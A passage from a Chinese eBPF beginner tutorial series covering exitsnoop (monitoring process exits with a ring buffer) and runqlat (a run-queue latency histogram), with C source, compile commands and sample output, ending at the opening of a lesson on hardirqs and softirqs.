<p>如果您希望学习更多关于 eBPF 的知识和实践,可以访问我们的教程代码仓库 <a href="https://github.com/eunomia-bpf/bpf-developer-tutorial">https://github.com/eunomia-bpf/bpf-developer-tutorial</a> 以获取更多示例和完整的教程。</p>
|
||
<div style="break-before: page; page-break-before: always;"></div><h1 id="ebpf-入门开发实践教程八在-ebpf-中使用-exitsnoop-监控进程退出事件使用-ring-buffer-向用户态打印输出"><a class="header" href="#ebpf-入门开发实践教程八在-ebpf-中使用-exitsnoop-监控进程退出事件使用-ring-buffer-向用户态打印输出">eBPF 入门开发实践教程八:在 eBPF 中使用 exitsnoop 监控进程退出事件,使用 ring buffer 向用户态打印输出</a></h1>
|
||
<p>eBPF (Extended Berkeley Packet Filter) 是 Linux 内核上的一个强大的网络和性能分析工具。它允许开发者在内核运行时动态加载、更新和运行用户定义的代码。</p>
|
||
<p>本文是 eBPF 入门开发实践教程的第八篇,在 eBPF 中使用 exitsnoop 监控进程退出事件。</p>
|
||
<h2 id="ring-buffer"><a class="header" href="#ring-buffer">ring buffer</a></h2>
|
||
<p>现在有一个新的 BPF 数据结构可用,eBPF 环形缓冲区(ring buffer)。它解决了 BPF perf buffer(当今从内核向用户空间发送数据的事实上的标准)的内存效率和事件重排问题,同时达到或超过了它的性能。它既提供了与 perf buffer 兼容以方便迁移,又有新的保留/提交API,具有更好的可用性。另外,合成和真实世界的基准测试表明,在几乎所有的情况下,所以考虑将其作为从BPF程序向用户空间发送数据的默认选择。</p>
|
||
<h3 id="ebpf-ringbuf-vs-ebpf-perfbuf"><a class="header" href="#ebpf-ringbuf-vs-ebpf-perfbuf">eBPF ringbuf vs eBPF perfbuf</a></h3>
|
||
<p>只要 BPF 程序需要将收集到的数据发送到用户空间进行后处理和记录,它通常会使用 BPF perf buffer(perfbuf)来实现。Perfbuf 是每个CPU循环缓冲区的集合,它允许在内核和用户空间之间有效地交换数据。它在实践中效果很好,但由于其按CPU设计,它有两个主要的缺点,在实践中被证明是不方便的:内存的低效使用和事件的重新排序。</p>
|
||
<p>为了解决这些问题,从Linux 5.8开始,BPF提供了一个新的BPF数据结构(BPF map)。BPF环形缓冲区(ringbuf)。它是一个多生产者、单消费者(MPSC)队列,可以同时在多个CPU上安全共享。</p>
|
||
<p>BPF ringbuf 支持来自 BPF perfbuf 的熟悉的功能:</p>
|
||
<ul>
|
||
<li>变长的数据记录。</li>
|
||
<li>能够通过内存映射区域有效地从用户空间读取数据,而不需要额外的内存拷贝和/或进入内核的系统调用。</li>
|
||
<li>既支持epoll通知,又能以绝对最小的延迟进行忙环操作。</li>
|
||
</ul>
|
||
<p>同时,BPF ringbuf解决了BPF perfbuf的以下问题:</p>
|
||
<ul>
|
||
<li>内存开销。</li>
|
||
<li>数据排序。</li>
|
||
<li>浪费的工作和额外的数据复制。</li>
|
||
</ul>
|
||
<h2 id="exitsnoop"><a class="header" href="#exitsnoop">exitsnoop</a></h2>
|
||
<p>本文是 eBPF 入门开发实践教程的第八篇,在 eBPF 中使用 exitsnoop 监控进程退出事件,并使用 ring buffer 向用户态打印输出。</p>
|
||
<p>使用 ring buffer 向用户态打印输出的步骤和 perf buffer 类似,首先需要定义一个头文件:</p>
|
||
<p>头文件:exitsnoop.h</p>
|
||
<pre><code class="language-c">#ifndef __BOOTSTRAP_H
|
||
#define __BOOTSTRAP_H
|
||
|
||
#define TASK_COMM_LEN 16
|
||
#define MAX_FILENAME_LEN 127
|
||
|
||
struct event {
|
||
int pid;
|
||
int ppid;
|
||
unsigned exit_code;
|
||
unsigned long long duration_ns;
|
||
char comm[TASK_COMM_LEN];
|
||
};
|
||
|
||
#endif /* __BOOTSTRAP_H */
|
||
</code></pre>
|
||
<p>源文件:exitsnoop.bpf.c</p>
|
||
<pre><code class="language-c">#include "vmlinux.h"
|
||
#include <bpf/bpf_helpers.h>
|
||
#include <bpf/bpf_tracing.h>
|
||
#include <bpf/bpf_core_read.h>
|
||
#include "exitsnoop.h"
|
||
char LICENSE[] SEC("license") = "Dual BSD/GPL";
|
||
|
||
struct {
|
||
__uint(type, BPF_MAP_TYPE_RINGBUF);
|
||
__uint(max_entries, 256 * 1024);
|
||
} rb SEC(".maps");
|
||
|
||
SEC("tp/sched/sched_process_exit")
|
||
int handle_exit(struct trace_event_raw_sched_process_template* ctx)
|
||
{
|
||
struct task_struct *task;
|
||
struct event *e;
|
||
pid_t pid, tid;
|
||
u64 id, ts, *start_ts, duration_ns = 0;
|
||
|
||
/* get PID and TID of exiting thread/process */
|
||
id = bpf_get_current_pid_tgid();
|
||
pid = id >> 32;
|
||
tid = (u32)id;
|
||
|
||
/* ignore thread exits */
|
||
if (pid != tid)
|
||
return 0;
|
||
|
||
/* reserve sample from BPF ringbuf */
|
||
e = bpf_ringbuf_reserve(&rb, sizeof(*e), 0);
|
||
if (!e)
|
||
return 0;
|
||
|
||
/* fill out the sample with data */
|
||
task = (struct task_struct *)bpf_get_current_task();
|
||
|
||
e->duration_ns = duration_ns;
|
||
e->pid = pid;
|
||
e->ppid = BPF_CORE_READ(task, real_parent, tgid);
|
||
e->exit_code = (BPF_CORE_READ(task, exit_code) >> 8) & 0xff;
|
||
bpf_get_current_comm(&e->comm, sizeof(e->comm));
|
||
|
||
/* send data to user-space for post-processing */
|
||
bpf_ringbuf_submit(e, 0);
|
||
return 0;
|
||
}
|
||
</code></pre>
|
||
<p>这段代码展示了如何使用 exitsnoop 监控进程退出事件并使用 ring buffer 向用户态打印输出:</p>
|
||
<ol>
|
||
<li>首先,我们引入所需的头文件和 exitsnoop.h。</li>
|
||
<li>定义一个名为 "LICENSE" 的全局变量,内容为 "Dual BSD/GPL",这是 eBPF 程序的许可证要求。</li>
|
||
<li>定义一个名为 rb 的 BPF_MAP_TYPE_RINGBUF 类型的映射,它将用于将内核空间的数据传输到用户空间。指定 max_entries 为 256 * 1024,代表 ring buffer 的最大容量。</li>
|
||
<li>定义一个名为 handle_exit 的 eBPF 程序,它将在进程退出事件触发时执行。传入一个名为 ctx 的 trace_event_raw_sched_process_template 结构体指针作为参数。</li>
|
||
<li>使用 bpf_get_current_pid_tgid() 函数获取当前任务的 PID 和 TID。对于主线程,PID 和 TID 相同;对于子线程,它们是不同的。我们只关心进程(主线程)的退出,因此在 PID 和 TID 不同时返回 0,忽略子线程退出事件。</li>
|
||
<li>使用 bpf_ringbuf_reserve 函数为事件结构体 e 在 ring buffer 中预留空间。如果预留失败,返回 0。</li>
|
||
<li>使用 bpf_get_current_task() 函数获取当前任务的 task_struct 结构指针。</li>
|
||
<li>将进程相关信息填充到预留的事件结构体 e 中,包括进程持续时间、PID、PPID、退出代码以及进程名称。</li>
|
||
<li>最后,使用 bpf_ringbuf_submit 函数将填充好的事件结构体 e 提交到 ring buffer,之后在用户空间进行处理和输出。</li>
|
||
</ol>
|
||
<p>这个示例展示了如何使用 exitsnoop 和 ring buffer 在 eBPF 程序中捕获进程退出事件并将相关信息传输到用户空间。这对于分析进程退出原因和监控系统行为非常有用。</p>
|
||
<h2 id="compile-and-run"><a class="header" href="#compile-and-run">Compile and Run</a></h2>
|
||
<p>eunomia-bpf 是一个结合 Wasm 的开源 eBPF 动态加载运行时和开发工具链,它的目的是简化 eBPF 程序的开发、构建、分发、运行。可以参考 <a href="https://github.com/eunomia-bpf/eunomia-bpf">https://github.com/eunomia-bpf/eunomia-bpf</a> 下载和安装 ecc 编译工具链和 ecli 运行时。我们使用 eunomia-bpf 编译运行这个例子。</p>
|
||
<p>Compile:</p>
|
||
<pre><code class="language-shell">docker run -it -v `pwd`/:/src/ ghcr.io/eunomia-bpf/ecc-`uname -m`:latest
|
||
</code></pre>
|
||
<p>Or</p>
|
||
<pre><code class="language-console">$ ecc exitsnoop.bpf.c exitsnoop.h
|
||
Compiling bpf object...
|
||
Generating export types...
|
||
Packing ebpf object and config into package.json...
|
||
</code></pre>
|
||
<p>Run:</p>
|
||
<pre><code class="language-console">$ sudo ./ecli run package.json
|
||
TIME PID PPID EXIT_CODE DURATION_NS COMM
|
||
21:40:09 42050 42049 0 0 which
|
||
21:40:09 42049 3517 0 0 sh
|
||
21:40:09 42052 42051 0 0 ps
|
||
21:40:09 42051 3517 0 0 sh
|
||
21:40:09 42055 42054 0 0 sed
|
||
21:40:09 42056 42054 0 0 cat
|
||
21:40:09 42057 42054 0 0 cat
|
||
21:40:09 42058 42054 0 0 cat
|
||
21:40:09 42059 42054 0 0 cat
|
||
</code></pre>
|
||
<h2 id="总结-7"><a class="header" href="#总结-7">总结</a></h2>
|
||
<p>本文介绍了如何使用 eunomia-bpf 开发一个简单的 BPF 程序,该程序可以监控 Linux 系统中的进程退出事件, 并将捕获的事件通过 ring buffer 发送给用户空间程序。在本文中,我们使用 eunomia-bpf 编译运行了这个例子。</p>
|
||
<p>为了更好地理解和实践 eBPF 编程,我们建议您阅读 eunomia-bpf 的官方文档:<a href="https://github.com/eunomia-bpf/eunomia-bpf">https://github.com/eunomia-bpf/eunomia-bpf</a> 。此外,我们还为您提供了完整的教程和源代码,您可以在 <a href="https://github.com/eunomia-bpf/bpf-developer-tutorial">https://github.com/eunomia-bpf/bpf-developer-tutorial</a> 中查看和学习。希望本教程能够帮助您顺利入门 eBPF 开发,并为您的进一步学习和实践提供有益的参考。</p>
|
||
<div style="break-before: page; page-break-before: always;"></div><h1 id="ebpf-入门开发实践教程九捕获进程调度延迟以直方图方式记录"><a class="header" href="#ebpf-入门开发实践教程九捕获进程调度延迟以直方图方式记录">eBPF 入门开发实践教程九:捕获进程调度延迟,以直方图方式记录</a></h1>
|
||
<p>eBPF (Extended Berkeley Packet Filter) 是 Linux 内核上的一个强大的网络和性能分析工具。它允许开发者在内核运行时动态加载、更新和运行用户定义的代码。</p>
|
||
<p>runqlat 是一个 eBPF 工具,用于分析 Linux 系统的调度性能。具体来说,runqlat 用于测量一个任务在被调度到 CPU 上运行之前在运行队列中等待的时间。这些信息对于识别性能瓶颈和提高 Linux 内核调度算法的整体效率非常有用。</p>
|
||
<h2 id="runqlat-原理"><a class="header" href="#runqlat-原理">runqlat 原理</a></h2>
|
||
<p>本教程是 eBPF 入门开发实践系列的第九部分,主题是 "捕获进程调度延迟"。在此,我们将介绍一个名为 runqlat 的程序,其作用是以直方图的形式记录进程调度延迟。</p>
|
||
<p>Linux 操作系统使用进程来执行所有的系统和用户任务。这些进程可能被阻塞、杀死、运行,或者正在等待运行。处在后两种状态的进程数量决定了 CPU 运行队列的长度。</p>
|
||
<p>进程有几种可能的状态,如:</p>
|
||
<ul>
|
||
<li>可运行或正在运行</li>
|
||
<li>可中断睡眠</li>
|
||
<li>不可中断睡眠</li>
|
||
<li>停止</li>
|
||
<li>僵尸进程</li>
|
||
</ul>
|
||
<p>等待资源或其他函数信号的进程会处在可中断或不可中断的睡眠状态:进程被置入睡眠状态,直到它需要的资源变得可用。然后,根据睡眠的类型,进程可以转移到可运行状态,或者保持睡眠。</p>
|
||
<p>即使进程拥有它需要的所有资源,它也不会立即开始运行。它会转移到可运行状态,与其他处在相同状态的进程一起排队。CPU可以在接下来的几秒钟或毫秒内执行这些进程。调度器为 CPU 排列进程,并决定下一个要执行的进程。</p>
|
||
<p>根据系统的硬件配置,这个可运行队列(称为 CPU 运行队列)的长度可以短也可以长。短的运行队列长度表示 CPU 没有被充分利用。另一方面,如果运行队列长,那么可能意味着 CPU 不够强大,无法执行所有的进程,或者 CPU 的核心数量不足。在理想的 CPU 利用率下,运行队列的长度将等于系统中的核心数量。</p>
|
||
<p>进程调度延迟,也被称为 "run queue latency",是衡量线程从变得可运行(例如,接收到中断,促使其处理更多工作)到实际在 CPU 上运行的时间。在 CPU 饱和的情况下,你可以想象线程必须等待其轮次。但在其他奇特的场景中,这也可能发生,而且在某些情况下,它可以通过调优减少,从而提高整个系统的性能。</p>
|
||
<p>我们将通过一个示例来阐述如何使用 runqlat 工具。这是一个负载非常重的系统:</p>
|
||
<pre><code class="language-shell"># runqlat
|
||
Tracing run queue latency... Hit Ctrl-C to end.
|
||
^C
|
||
usecs : count distribution
|
||
0 -> 1 : 233 |*********** |
|
||
2 -> 3 : 742 |************************************ |
|
||
4 -> 7 : 203 |********** |
|
||
8 -> 15 : 173 |******** |
|
||
16 -> 31 : 24 |* |
|
||
32 -> 63 : 0 | |
|
||
64 -> 127 : 30 |* |
|
||
128 -> 255 : 6 | |
|
||
256 -> 511 : 3 | |
|
||
512 -> 1023 : 5 | |
|
||
1024 -> 2047 : 27 |* |
|
||
2048 -> 4095 : 30 |* |
|
||
4096 -> 8191 : 20 | |
|
||
8192 -> 16383 : 29 |* |
|
||
16384 -> 32767 : 809 |****************************************|
|
||
32768 -> 65535 : 64 |*** |
|
||
</code></pre>
|
||
<p>在这个输出中,我们看到了一个双模分布,一个模在0到15微秒之间,另一个模在16到65毫秒之间。这些模式在分布(它仅仅是 "count" 列的视觉表示)中显示为尖峰。例如,读取一行:在追踪过程中,809个事件落入了16384到32767微秒的范围(16到32毫秒)。</p>
|
||
<p>在后续的教程中,我们将深入探讨如何利用 eBPF 对此类指标进行深度跟踪和分析,以更好地理解和优化系统性能。同时,我们也将学习更多关于 Linux 内核调度器、中断处理和 CPU 饱</p>
|
||
<p>runqlat 的实现利用了 eBPF 程序,它通过内核跟踪点和函数探针来测量进程在运行队列中的时间。当进程被排队时,trace_enqueue 函数会在一个映射中记录时间戳。当进程被调度到 CPU 上运行时,handle_switch 函数会检索时间戳,并计算当前时间与排队时间之间的时间差。这个差值(或 delta)被用于更新进程的直方图,该直方图记录运行队列延迟的分布。该直方图可用于分析 Linux 内核的调度性能。</p>
|
||
<h2 id="runqlat-代码实现"><a class="header" href="#runqlat-代码实现">runqlat 代码实现</a></h2>
|
||
<h3 id="runqlatbpfc"><a class="header" href="#runqlatbpfc">runqlat.bpf.c</a></h3>
|
||
<p>首先我们需要编写一个源代码文件 runqlat.bpf.c:</p>
|
||
<pre><code class="language-c">// SPDX-License-Identifier: GPL-2.0
|
||
// Copyright (c) 2020 Wenbo Zhang
|
||
#include <vmlinux.h>
|
||
#include <bpf/bpf_helpers.h>
|
||
#include <bpf/bpf_core_read.h>
|
||
#include <bpf/bpf_tracing.h>
|
||
#include "runqlat.h"
|
||
#include "bits.bpf.h"
|
||
#include "maps.bpf.h"
|
||
#include "core_fixes.bpf.h"
|
||
|
||
#define MAX_ENTRIES 10240
|
||
#define TASK_RUNNING 0
|
||
|
||
const volatile bool filter_cg = false;
|
||
const volatile bool targ_per_process = false;
|
||
const volatile bool targ_per_thread = false;
|
||
const volatile bool targ_per_pidns = false;
|
||
const volatile bool targ_ms = false;
|
||
const volatile pid_t targ_tgid = 0;
|
||
|
||
struct {
|
||
__uint(type, BPF_MAP_TYPE_CGROUP_ARRAY);
|
||
__type(key, u32);
|
||
__type(value, u32);
|
||
__uint(max_entries, 1);
|
||
} cgroup_map SEC(".maps");
|
||
|
||
struct {
|
||
__uint(type, BPF_MAP_TYPE_HASH);
|
||
__uint(max_entries, MAX_ENTRIES);
|
||
__type(key, u32);
|
||
__type(value, u64);
|
||
} start SEC(".maps");
|
||
|
||
static struct hist zero;
|
||
|
||
/// @sample {"interval": 1000, "type" : "log2_hist"}
|
||
struct {
|
||
__uint(type, BPF_MAP_TYPE_HASH);
|
||
__uint(max_entries, MAX_ENTRIES);
|
||
__type(key, u32);
|
||
__type(value, struct hist);
|
||
} hists SEC(".maps");
|
||
|
||
static int trace_enqueue(u32 tgid, u32 pid)
|
||
{
|
||
u64 ts;
|
||
|
||
if (!pid)
|
||
return 0;
|
||
if (targ_tgid && targ_tgid != tgid)
|
||
return 0;
|
||
|
||
ts = bpf_ktime_get_ns();
|
||
bpf_map_update_elem(&start, &pid, &ts, BPF_ANY);
|
||
return 0;
|
||
}
|
||
|
||
static unsigned int pid_namespace(struct task_struct *task)
|
||
{
|
||
struct pid *pid;
|
||
unsigned int level;
|
||
struct upid upid;
|
||
unsigned int inum;
|
||
|
||
/* get the pid namespace by following task_active_pid_ns(),
|
||
* pid->numbers[pid->level].ns
|
||
*/
|
||
pid = BPF_CORE_READ(task, thread_pid);
|
||
level = BPF_CORE_READ(pid, level);
|
||
bpf_core_read(&upid, sizeof(upid), &pid->numbers[level]);
|
||
inum = BPF_CORE_READ(upid.ns, ns.inum);
|
||
|
||
return inum;
|
||
}
|
||
|
||
static int handle_switch(bool preempt, struct task_struct *prev, struct task_struct *next)
|
||
{
|
||
struct hist *histp;
|
||
u64 *tsp, slot;
|
||
u32 pid, hkey;
|
||
s64 delta;
|
||
|
||
if (filter_cg && !bpf_current_task_under_cgroup(&cgroup_map, 0))
|
||
return 0;
|
||
|
||
if (get_task_state(prev) == TASK_RUNNING)
|
||
trace_enqueue(BPF_CORE_READ(prev, tgid), BPF_CORE_READ(prev, pid));
|
||
|
||
pid = BPF_CORE_READ(next, pid);
|
||
|
||
tsp = bpf_map_lookup_elem(&start, &pid);
|
||
if (!tsp)
|
||
return 0;
|
||
delta = bpf_ktime_get_ns() - *tsp;
|
||
if (delta < 0)
|
||
goto cleanup;
|
||
|
||
if (targ_per_process)
|
||
hkey = BPF_CORE_READ(next, tgid);
|
||
else if (targ_per_thread)
|
||
hkey = pid;
|
||
else if (targ_per_pidns)
|
||
hkey = pid_namespace(next);
|
||
else
|
||
hkey = -1;
|
||
histp = bpf_map_lookup_or_try_init(&hists, &hkey, &zero);
|
||
if (!histp)
|
||
goto cleanup;
|
||
if (!histp->comm[0])
|
||
bpf_probe_read_kernel_str(&histp->comm, sizeof(histp->comm),
|
||
next->comm);
|
||
if (targ_ms)
|
||
delta /= 1000000U;
|
||
else
|
||
delta /= 1000U;
|
||
slot = log2l(delta);
|
||
if (slot >= MAX_SLOTS)
|
||
slot = MAX_SLOTS - 1;
|
||
__sync_fetch_and_add(&histp->slots[slot], 1);
|
||
|
||
cleanup:
|
||
bpf_map_delete_elem(&start, &pid);
|
||
return 0;
|
||
}
|
||
|
||
SEC("raw_tp/sched_wakeup")
|
||
int BPF_PROG(handle_sched_wakeup, struct task_struct *p)
|
||
{
|
||
if (filter_cg && !bpf_current_task_under_cgroup(&cgroup_map, 0))
|
||
return 0;
|
||
|
||
return trace_enqueue(BPF_CORE_READ(p, tgid), BPF_CORE_READ(p, pid));
|
||
}
|
||
|
||
SEC("raw_tp/sched_wakeup_new")
|
||
int BPF_PROG(handle_sched_wakeup_new, struct task_struct *p)
|
||
{
|
||
if (filter_cg && !bpf_current_task_under_cgroup(&cgroup_map, 0))
|
||
return 0;
|
||
|
||
return trace_enqueue(BPF_CORE_READ(p, tgid), BPF_CORE_READ(p, pid));
|
||
}
|
||
|
||
SEC("raw_tp/sched_switch")
|
||
int BPF_PROG(handle_sched_switch, bool preempt, struct task_struct *prev, struct task_struct *next)
|
||
{
|
||
return handle_switch(preempt, prev, next);
|
||
}
|
||
|
||
char LICENSE[] SEC("license") = "GPL";
|
||
</code></pre>
|
||
<p>这其中定义了一些常量和全局变量,用于过滤对应的追踪目标:</p>
|
||
<pre><code class="language-c">#define MAX_ENTRIES 10240
|
||
#define TASK_RUNNING 0
|
||
|
||
const volatile bool filter_cg = false;
|
||
const volatile bool targ_per_process = false;
|
||
const volatile bool targ_per_thread = false;
|
||
const volatile bool targ_per_pidns = false;
|
||
const volatile bool targ_ms = false;
|
||
const volatile pid_t targ_tgid = 0;
|
||
</code></pre>
|
||
<p>这些变量包括最大映射项数量、任务状态、过滤选项和目标选项。这些选项可以通过用户空间程序设置,以定制 eBPF 程序的行为。</p>
|
||
<p>接下来,定义了一些 eBPF 映射:</p>
|
||
<pre><code class="language-c">struct {
|
||
__uint(type, BPF_MAP_TYPE_CGROUP_ARRAY);
|
||
__type(key, u32);
|
||
__type(value, u32);
|
||
__uint(max_entries, 1);
|
||
} cgroup_map SEC(".maps");
|
||
|
||
struct {
|
||
__uint(type, BPF_MAP_TYPE_HASH);
|
||
__uint(max_entries, MAX_ENTRIES);
|
||
__type(key, u32);
|
||
__type(value, u64);
|
||
} start SEC(".maps");
|
||
|
||
static struct hist zero;
|
||
|
||
struct {
|
||
__uint(type, BPF_MAP_TYPE_HASH);
|
||
__uint(max_entries, MAX_ENTRIES);
|
||
__type(key, u32);
|
||
__type(value, struct hist);
|
||
} hists SEC(".maps");
|
||
</code></pre>
|
||
<p>这些映射包括:</p>
|
||
<ul>
|
||
<li>cgroup_map 用于过滤 cgroup;</li>
|
||
<li>start 用于存储进程入队时的时间戳;</li>
|
||
<li>hists 用于存储直方图数据,记录进程调度延迟。</li>
|
||
</ul>
|
||
<p>接下来是一些辅助函数:</p>
|
||
<p>trace_enqueue 函数用于在进程入队时记录其时间戳:</p>
|
||
<pre><code class="language-c">static int trace_enqueue(u32 tgid, u32 pid)
|
||
{
|
||
u64 ts;
|
||
|
||
if (!pid)
|
||
return 0;
|
||
if (targ_tgid && targ_tgid != tgid)
|
||
return 0;
|
||
|
||
ts = bpf_ktime_get_ns();
|
||
bpf_map_update_elem(&start, &pid, &ts, BPF_ANY);
|
||
return 0;
|
||
}
|
||
</code></pre>
|
||
<p>pid_namespace 函数用于获取进程所属的 PID namespace:</p>
|
||
<pre><code class="language-c">static unsigned int pid_namespace(struct task_struct *task)
|
||
{
|
||
struct pid *pid;
|
||
unsigned int level;
|
||
struct upid upid;
|
||
unsigned int inum;
|
||
|
||
/* get the pid namespace by following task_active_pid_ns(),
|
||
* pid->numbers[pid->level].ns
|
||
*/
|
||
pid = BPF_CORE_READ(task, thread_pid);
|
||
level = BPF_CORE_READ(pid, level);
|
||
bpf_core_read(&upid, sizeof(upid), &pid->numbers[level]);
|
||
inum = BPF_CORE_READ(upid.ns, ns.inum);
|
||
|
||
return inum;
|
||
}
|
||
</code></pre>
|
||
<p>handle_switch 函数是核心部分,用于处理调度切换事件,计算进程调度延迟并更新直方图数据:</p>
|
||
<pre><code class="language-c">static int handle_switch(bool preempt, struct task_struct *prev, struct task_struct *next)
|
||
{
|
||
...
|
||
}
|
||
</code></pre>
|
||
<p>首先,函数根据 filter_cg 的设置判断是否需要过滤 cgroup。然后,如果之前的进程状态为 TASK_RUNNING,则调用 trace_enqueue 函数记录进程的入队时间。接着,函数查找下一个进程的入队时间戳,如果找不到,直接返回。计算调度延迟(delta),并根据不同的选项设置(targ_per_process,targ_per_thread,targ_per_pidns),确定直方图映射的键(hkey)。然后查找或初始化直方图映射,更新直方图数据,最后删除进程的入队时间戳记录。</p>
|
||
<p>接下来是 eBPF 程序的入口点。程序使用三个入口点来捕获不同的调度事件:</p>
|
||
<ul>
|
||
<li>handle_sched_wakeup:用于处理 sched_wakeup 事件,当一个进程从睡眠状态被唤醒时触发。</li>
|
||
<li>handle_sched_wakeup_new:用于处理 sched_wakeup_new 事件,当一个新创建的进程被唤醒时触发。</li>
|
||
<li>handle_sched_switch:用于处理 sched_switch 事件,当调度器选择一个新的进程运行时触发。</li>
|
||
</ul>
|
||
<p>这些入口点分别处理不同的调度事件,但都会调用 handle_switch 函数来计算进程的调度延迟并更新直方图数据。</p>
|
||
<p>最后,程序包含一个许可证声明:</p>
|
||
<pre><code class="language-c">char LICENSE[] SEC("license") = "GPL";
|
||
</code></pre>
|
||
<p>这一声明指定了 eBPF 程序的许可证类型,这里使用的是 "GPL"。这对于许多内核功能是必需的,因为它们要求 eBPF 程序遵循 GPL 许可证。</p>
|
||
<h3 id="runqlath"><a class="header" href="#runqlath">runqlat.h</a></h3>
|
||
<p>然后我们需要定义一个头文件<code>runqlat.h</code>,用来给用户态处理从内核态上报的事件:</p>
|
||
<pre><code class="language-c">/* SPDX-License-Identifier: (LGPL-2.1 OR BSD-2-Clause) */
|
||
#ifndef __RUNQLAT_H
|
||
#define __RUNQLAT_H
|
||
|
||
#define TASK_COMM_LEN 16
|
||
#define MAX_SLOTS 26
|
||
|
||
struct hist {
|
||
__u32 slots[MAX_SLOTS];
|
||
char comm[TASK_COMM_LEN];
|
||
};
|
||
|
||
#endif /* __RUNQLAT_H */
|
||
</code></pre>
|
||
<h2 id="编译运行"><a class="header" href="#编译运行">编译运行</a></h2>
|
||
<p>eunomia-bpf 是一个结合 Wasm 的开源 eBPF 动态加载运行时和开发工具链,它的目的是简化 eBPF 程序的开发、构建、分发、运行。可以参考 <a href="https://github.com/eunomia-bpf/eunomia-bpf">https://github.com/eunomia-bpf/eunomia-bpf</a> 下载和安装 ecc 编译工具链和 ecli 运行时。我们使用 eunomia-bpf 编译运行这个例子。</p>
|
||
<p>Compile:</p>
|
||
<pre><code class="language-shell">docker run -it -v `pwd`/:/src/ ghcr.io/eunomia-bpf/ecc-`uname -m`:latest
|
||
</code></pre>
|
||
<p>或者</p>
|
||
<pre><code class="language-console">$ ecc runqlat.bpf.c runqlat.h
|
||
Compiling bpf object...
|
||
Generating export types...
|
||
Packing ebpf object and config into package.json...
|
||
</code></pre>
|
||
<p>Run:</p>
|
||
<pre><code class="language-console">$ sudo ecli run examples/bpftools/runqlat/package.json -h
|
||
Usage: runqlat_bpf [--help] [--version] [--verbose] [--filter_cg] [--targ_per_process] [--targ_per_thread] [--targ_per_pidns] [--targ_ms] [--targ_tgid VAR]
|
||
|
||
A simple eBPF program
|
||
|
||
Optional arguments:
|
||
-h, --help shows help message and exits
|
||
-v, --version prints version information and exits
|
||
--verbose prints libbpf debug information
|
||
--filter_cg set value of bool variable filter_cg
|
||
--targ_per_process set value of bool variable targ_per_process
|
||
--targ_per_thread set value of bool variable targ_per_thread
|
||
--targ_per_pidns set value of bool variable targ_per_pidns
|
||
--targ_ms set value of bool variable targ_ms
|
||
--targ_tgid set value of pid_t variable targ_tgid
|
||
|
||
Built with eunomia-bpf framework.
|
||
See https://github.com/eunomia-bpf/eunomia-bpf for more information.
|
||
|
||
$ sudo ecli run examples/bpftools/runqlat/package.json
|
||
key = 4294967295
|
||
comm = rcu_preempt
|
||
|
||
(unit) : count distribution
|
||
0 -> 1 : 9 |**** |
|
||
2 -> 3 : 6 |** |
|
||
4 -> 7 : 12 |***** |
|
||
8 -> 15 : 28 |************* |
|
||
16 -> 31 : 40 |******************* |
|
||
32 -> 63 : 83 |****************************************|
|
||
64 -> 127 : 57 |*************************** |
|
||
128 -> 255 : 19 |********* |
|
||
256 -> 511 : 11 |***** |
|
||
512 -> 1023 : 2 | |
|
||
1024 -> 2047 : 2 | |
|
||
2048 -> 4095 : 0 | |
|
||
4096 -> 8191 : 0 | |
|
||
8192 -> 16383 : 0 | |
|
||
16384 -> 32767 : 1 | |
|
||
|
||
$ sudo ecli run examples/bpftools/runqlat/package.json --targ_per_process
|
||
key = 3189
|
||
comm = cpptools
|
||
|
||
(unit) : count distribution
|
||
0 -> 1 : 0 | |
|
||
2 -> 3 : 0 | |
|
||
4 -> 7 : 0 | |
|
||
8 -> 15 : 1 |*** |
|
||
16 -> 31 : 2 |******* |
|
||
32 -> 63 : 11 |****************************************|
|
||
64 -> 127 : 8 |***************************** |
|
||
128 -> 255 : 3 |********** |
|
||
</code></pre>
|
||
<p>完整源代码请见:<a href="https://github.com/eunomia-bpf/bpf-developer-tutorial/tree/main/src/9-runqlat">https://github.com/eunomia-bpf/bpf-developer-tutorial/tree/main/src/9-runqlat</a></p>
|
||
<p>参考资料:</p>
|
||
<ul>
|
||
<li><a href="https://www.brendangregg.com/blog/2016-10-08/linux-bcc-runqlat.html">https://www.brendangregg.com/blog/2016-10-08/linux-bcc-runqlat.html</a></li>
|
||
<li><a href="https://github.com/iovisor/bcc/blob/master/libbpf-tools/runqlat.c">https://github.com/iovisor/bcc/blob/master/libbpf-tools/runqlat.c</a></li>
|
||
</ul>
|
||
<h2 id="总结-8"><a class="header" href="#总结-8">总结</a></h2>
|
||
<p>runqlat 是一个 Linux 内核 BPF 程序,通过柱状图来总结调度程序运行队列延迟,显示任务等待运行在 CPU 上的时间长度。编译这个程序可以使用 ecc 工具,运行时可以使用 ecli 命令。</p>
|
||
<p>runqlat 是一种用于监控Linux内核中进程调度延迟的工具。它可以帮助您了解进程在内核中等待执行的时间,并根据这些信息优化进程调度,提高系统的性能。可以在 libbpf-tools 中找到最初的源代码:<a href="https://github.com/iovisor/bcc/blob/master/libbpf-tools/runqlat.bpf.c">https://github.com/iovisor/bcc/blob/master/libbpf-tools/runqlat.bpf.c</a></p>
|
||
<p>更多的例子和详细的开发指南,请参考 eunomia-bpf 的官方文档:<a href="https://github.com/eunomia-bpf/eunomia-bpf">https://github.com/eunomia-bpf/eunomia-bpf</a></p>
|
||
<p>如果您希望学习更多关于 eBPF 的知识和实践,可以访问我们的教程代码仓库 <a href="https://github.com/eunomia-bpf/bpf-developer-tutorial">https://github.com/eunomia-bpf/bpf-developer-tutorial</a> 以获取更多示例和完整的教程。</p>
|
||
<div style="break-before: page; page-break-before: always;"></div><h1 id="ebpf-入门开发实践教程十在-ebpf-中使用-hardirqs-或-softirqs-捕获中断事件"><a class="header" href="#ebpf-入门开发实践教程十在-ebpf-中使用-hardirqs-或-softirqs-捕获中断事件">eBPF 入门开发实践教程十:在 eBPF 中使用 hardirqs 或 softirqs 捕获中断事件</a></h1>
|
||
<p>eBPF (Extended Berkeley Packet Filter) 是 Linux 内核上的一个强大的网络和性能分析工具。它允许开发者在内核运行时动态加载、更新和运行用户定义的代码。</p>
|
||
<p>本文是 eBPF 入门开发实践教程的第十篇,在 eBPF 中使用 hardirqs 或 softirqs 捕获中断事件。
|
||
hardirqs 和 softirqs 是 Linux 内核中两种不同类型的中断处理程序。它们用于处理硬件设备产生的中断请求,以及内核中的异步事件。在 eBPF 中,我们可以使用同名的 eBPF 工具 hardirqs 和 softirqs 来捕获和分析内核中与中断处理相关的信息。</p>
|
||
<h2 id="hardirqs-和-softirqs-是什么"><a class="header" href="#hardirqs-和-softirqs-是什么">hardirqs 和 softirqs 是什么?</a></h2>
|
||
